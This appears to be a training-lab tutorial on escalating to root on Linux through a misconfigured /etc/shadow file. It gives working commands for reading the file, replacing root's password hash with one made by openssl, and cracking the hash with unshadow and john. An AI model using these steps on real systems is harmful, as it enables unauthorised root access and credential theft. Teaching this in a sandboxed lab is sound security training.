Linux systems rely on the /etc/passwd and /etc/shadow files for user authentication and access control. If system administrators misconfigure permissions or contents of these files, it can create opportunities for privilege escalation attacks. In this lab, you will learn how to leverage the /etc/shadow file to gain root privileges on a Linux system. This scenario assumes you have already obtained initial low-privileged shell access as a regular user.
In this step, you will learn about the structure and purpose of the /etc/shadow file.
The /etc/shadow file stores encrypted passwords and password-related configuration information for each user account. Each line in the file represents one user and contains 9 colon-separated fields:
Open a terminal and navigate to the /home/labex/project directory.
cd /home/labex/projectLet's check the labex user's entry in the /etc/shadow file:
sudo cat /etc/shadow | grep labex > /home/labex/project/labex_shadow.txtNotice that we used sudo to read the /etc/shadow file. This is because the file is only readable by the root user.
Check the contents of the labex_shadow.txt file:
cat labex_shadow.txtExample output:
labex:$y$j9T$enO.7A1WiUBiOvRdw4gox0$cCOqZqHAQgLkhPb.NDJO9zO6T3EUQ3.AeE0amN57AZ8:19818:0:99999:7:::This line indicates:
labex$y$j9T$enO.7A1WiUBiOvRdw4gox0$cCOqZqHAQgLkhPb.NDJO9zO6T3EUQ3.AeE0amN57AZ8By default, only the root user can read and modify the /etc/shadow file. However, misconfigured permissions can sometimes provide opportunities for privilege escalation.
In this step, you will learn how to escalate privileges by modifying the root password in the /etc/shadow file if you have write access to it.
First, open a terminal and navigate to the /home/labex/project directory:
cd /home/labex/projectYou will found a script named env_setup_1.sh in the directory. Run this script to set up the environment:
./env_setup_1.shThis will set up the environment and switch you to the user001 user, simulating an initial low-privileged shell access.
Navigate to the user001 home directory:
cd ~Next, check the permissions of the /etc/shadow file:
ls -alh /etc/shadowExample output:
-rw-r----- 1 user001 shadow 1.2K Apr 6 19:16 /etc/shadowYou should see that the user001 user has write access to the /etc/shadow file due to a misconfiguration.
Now, you can edit the /etc/shadow file and replace the root user's password hash with a new one.
First, view the current root password hash:
cat /etc/shadow | grep rootExample output:
root:**$6$5PfZMEbQ$pCjxwZagiIqsrkL4V6r3flOiKQrheDV5eup3zicnvBSKPItaddhUfDAVA5GWAYUHX9LQ5kXzLH8ehoUno2qkE/**:18167:0:99999:7:::To set a new password (e.g., pass123), generate a new password hash using the openssl utility:
openssl passwd -1 -salt ignite pass123Example output:
$1$ignite$3eTbJm98O9Hz.k1NTdNxe1Open the /etc/shadow file in a text editor and replace the root user's password hash with the new one.
nano /etc/shadowFound the root user's password hash:
root:**$6$5PfZMEbQ$pCjxwZagiIqsrkL4V6r3flOiKQrheDV5eup3zicnvBSKPItaddhUfDAVA5GWAYUHX9LQ5kXzLH8ehoUno2qkE/**:18167:0:99999:7:::Replace the password hash with the new one:
root:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:18167:0:99999:7:::Save the changes and exit the editor.
Finally, use the su root command to switch to the root user, entering the new password pass123 when prompted.
su rootYou should now have root privileges on the system.
In this step, you will learn how to escalate privileges by cracking the root password hash if you only have read access to the /etc/shadow file.
After last step, you should stay in the root user. You can open a new terminal or use exit command to logout current user till you reach the labex user.
When you are in the labex user, navigate to the /home/labex/project directory:
cd /home/labex/projectRun the env_setup_2.sh script to set up the environment:
./env_setup_2.shThis will set up a new environment where the user001 user has read access to the /etc/shadow file.
Navigate to the user001 home directory:
cd ~Verify the permissions of the /etc/shadow file:
ls -alh /etc/shadowExample output:
-rw-r--r-- 1 root shadow 1.2K Apr 6 19:19 /etc/shadowYou should see that the user001 user has read access to the /etc/shadow file due to a misconfiguration.
Next, we can use the john tool to crack the root user's password hash. Before using john, you need to combine the contents of the /etc/passwd and /etc/shadow files using the unshadow command:
unshadow /etc/passwd /etc/shadow > ~/shadow_crack.txtNow, run john on the shadow_crack.txt file to crack the root user's password hash and save the cracked passwords to a file:
john --users=root shadow_crack.txt > cracked_passwords.txtCheck the contents of the cracked_passwords.txt file to view the cracked password:
Loaded 1 password hash (md5crypt [MD5 32/64 X2])
study (root)Finally, use the su root command to switch to the root user, entering the cracked password study when prompted:
su rootYou should now have root privileges on the system.
In this lab, you learned about the structure and purpose of the /etc/shadow file, as well as two methods for escalating privileges by leveraging this file: modifying the root password hash with write access, or cracking the root password hash with read access. These techniques demonstrate the importance of properly configuring file permissions and securing sensitive system files in a Linux environment.